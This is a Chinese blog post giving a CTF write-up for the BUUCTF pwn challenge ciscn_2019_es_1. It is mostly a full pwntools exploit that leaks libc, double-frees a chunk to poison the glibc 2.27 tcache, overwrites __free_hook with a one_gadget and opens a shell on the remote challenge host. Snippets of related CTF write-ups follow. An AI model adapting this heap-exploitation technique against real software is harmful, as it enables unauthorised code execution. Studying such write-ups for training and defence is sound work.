ciscn_2019_es_1

最新推荐文章于 2022-04-09 12:24:25 发布
最新推荐文章于 2022-04-09 12:24:25 发布
阅读量857 收藏
点赞数 1
分类专栏: buuctf 题目 文章标签: 大数据 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zzq487782568/article/details/122464290
版权

ciscn_2019_es_1

查看保护
请添加图片描述
请添加图片描述
有一个uaf在call函数里,2.27下可以double free的libc,思路很明确,直接申请大堆泄露出libc_base,再double free劫持tcache链表,写入free_hook进tcache。改hook为one_gadget即可。

from pwn import *

context(arch='amd64', os='linux', log_level='debug')

file_name = './z1r0'

debug = 1
if debug:
    r = remote('node4.buuoj.cn', 25115)
else:
    r = process(file_name)

elf = ELF(file_name)

def dbg():
    gdb.attach(r)

menu = 'choice:'

def add(size, name, call):
    r.sendlineafter(menu, '1')
    r.sendlineafter("Please input the size of compary's name", str(size))
    r.sendlineafter("please input name:", name)
    r.sendafter("please input compary call:", call)

def delete(index):
    r.sendlineafter(menu, '3')
    r.sendlineafter('Please input the index:', str(index))

def show(index):
    r.sendlineafter(menu, '2')
    r.sendlineafter("Please input the index:", str(index))

add(0x420, 'aaaa', 'b' * 0xc)   #0
add(0x10, 'bbbb', 'b' * 0xc)    #1
add(0x10, 'cccc', 'c' * 0xc)    #2

delete(0)

show(0)

malloc_hook = u64(r.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) - 96 - 0x10
success('malloc_hook = ' + hex(malloc_hook))

libc = ELF('./2.27/libc-2.27.so')
libc_base = malloc_hook - libc.sym['__malloc_hook']
free_hook = libc_base + libc.sym['__free_hook']
one = [0x4f2c5, 0x4f322, 0x10a38c]
one_gadget = one[1] + libc_base

delete(1)
delete(1)

show(1)

r.recvuntil("name:\n")
chunk_addr = u64(r.recv(6).ljust(8, b'\x00'))
success('chunk_addr = ' + hex(chunk_addr))

tcache_addr = chunk_addr - 0x680
success('tcache_addr = ' + hex(tcache_addr))

add(0x10, p64(free_hook), p64(tcache_addr))
add(0x10, p64(one_gadget), p64(one_gadget))

delete(2)

r.interactive()
z1r0.
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
赛点资源数据包_嵌入式_2019.zip
06-28
1. **硬件基础**:这部分可能包括各种微处理器和微控制器的介绍,如ARM架构、RISC-V等,以及它们的性能、功耗和应用范围。还可能涉及存储器类型(如RAM、ROM)和外设接口(如I2C、SPI、UART)。 2. **操作系统与...
ciscn_2019_es_1 writeup
SkYe's Blog
10-24 703
基本情况 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 简单堆管理程序,有增删查功能。chunk 上限为 12 个,有 0x18 的结构体,又通过链表管理结构体。结构体如下: struct { void **chunk_ptr;//8bit size_t size;//4bit int number;//(12
[BUUCTF]PWN——ciscn_2019_es_1
mcmuyanga的博客
07-20 1333
ciscn_2019_es_1 装了一个ubuntu18.04的机子,终于可以做2.27的题目了 例行检查,64位程序,保护全开 本地运行一下程序,经典的堆体菜单 64位ida载入,看一下各个选项的函数
BUUCTF ciscn_2019_es_1
doudoudedi
01-04 886
我本地直接用fastbin attack直接能打通但是远程似乎有问题 思路 首先申请一个smallbin大小的trunk然后释放打印得到libc基址,然后double free打fastbin attack之后写到libc去__malloc_hook写入one_gadget再次add获取shell 以下为ubuntu16的环境下本地也就是libc-2.23 exp: #!/usr/bin/pyth...
ciscn_2019_es_2
xieyichensss的博客
05-05 625
这一题主要是利用栈迁移,这对我来说是新知识,所以花了比较长的时间来复现和看其他师傅的wp。 思路: 1.read0x30个字节,而s大小只有0x28,留给我们的操作空间不大呀,那我们把前边题目要写入垃圾数据的空间不填入垃圾数据,填入需要的payload,然后在ebp位置上填要返回的位置(就是填垃圾数据的地方),最后在ret位置上填leave_ret的地址(这里要注意,vul函数退出时有一个leave_ret,但是我们又构造了一个leave_ret)明天出动态调试过程,今天不想动脑嘿嘿 ...
Elasticsearch 中国开发者调查报告_2019.pdf
12-20
2010年 Elasticsearch 首个...为了深入了解 Elasticsearch 开发者群体的现状,2019 年 11 月,Elastic 技术社区、阿里巴巴 Elasticsearch 技术团队和阿里云开发者社区三方联合发起了 Elasticsearch 开发者调研活动。
2019年欧洲车身会议蔚来ES8_Benchmark数据.pdf
01-21
2019年欧洲车身会议蔚来ES8_Benchmark数据
opengl-es.zip_opengl_opengl es
09-14
OpenGL ES(OpenGL for Embedded Systems)是OpenGL的一个精简版本,专为嵌入式设备和移动设备设计,如智能手机、平板电脑等。它主要用于处理2D和3D图形渲染,是开发游戏、图形应用和增强现实应用的核心技术。OpenGL...
GLView.rar_class A_opengl es
09-19
A helper class to simplify writing an Activity that renders using OpenGL ES.
BUUCTF栈迁移ciscn_2019_es_2
Rt1Text的博客
04-09 1011
1.checksec+运行获取基本信息 32位+NX堆栈不可执行 2.常规IDA操作 1.main函数 并没有什么 2.int vul()函数 程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作 但是shift+f12 这里仅仅是打印flag字符串,没有用 同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数 但是...
pwnciscn_2019_es_2
Nothing
12-24 2764
例行检查 分析程序,程序存在system函数,但是不能直接得到flag。 vul函数中存在栈溢出,但只能溢出8个字节,只能盖到ebp和ret。vul函数中有两次read和printf第一次可以用来泄露ebp,得到栈地址,然后进行栈迁移。然后利用main函数返回时将控制流转到system。 根据一下汇编代码布置栈数据。 from pwn import * #io=process('ciscn...
ciscn2019部分writeup
Sea_Sand息禅
06-06 1294
Web 1、JustSoso 拿到源码 打开靶机,查看源码得到提示: 一看就是文件读取,然后就文件读取走一波。 file=php://filter/read=convert.base64-encode/resource=hint.php base64解码拿到hint.php的源码: <?php class Handle{ private $handle; ...
BUUCTF ciscn_2019_c_1(rop_x64,泄露libc)
菜的只能随便写写博客
11-26 5855
由于Ubuntu18的环境很迷,这个题目只在kali上用本地libc完成过,脚本也是kali环境的 0x1 检查文件 64位elf 无canary 无PIE   0x02 流程分析 根据运行的流程,这个程序主要有两个功能,加密功能可以使用,但解密功能没办法使用,并且能够输入的地方就两个,一个选择程序,数字输入,第二个输入加密文本,字符串类型,之后的静态分析主要关注这两个地方。   0x02...
ciscn_2019_n_5
qq_39869547的博客
01-11 962
very easy # -*- coding:utf-8 -*- from PwnContext.core import * local = 1 if local == 1 : p = remote('node3.buuoj.cn','25056') else: ctx.binary = binary ctx.remote_libc = debug_libc ctx...
BUUCTF ciscn_2019_c_1 write up
qq_43189757的博客
09-06 4865
分析: 程序的逻辑比较简单,漏洞点在encrypt 函数中的gets函数中 在encrypt函数中由gets函数输入数据,随后程序对输入的数据进行加密 1.如果是小写字母跟0xD异或 2.如果是大写字母跟0xE异或 3.如果是数字跟0xF异或 在这个循环中会破坏我们设置好的数据,但是可以通过两次异或运算又转换为我们设置好的数据 二进制文件中没有出现getshell和system之类的函数,所以要通...
es 删除数据_干货 | 携程Elasticsearch数据同步实践
最新发布
06-07
您需要关于 Elasticsearch 的数据删除操作的信息吗?如果是的话,可以使用 Elasticsearch 提供的 Delete API 来删除单个或多个文档。例如,您可以使用以下命令删除具有指定 ID 的单个文档: ``` DELETE /my_index/_...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

z1r0.

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值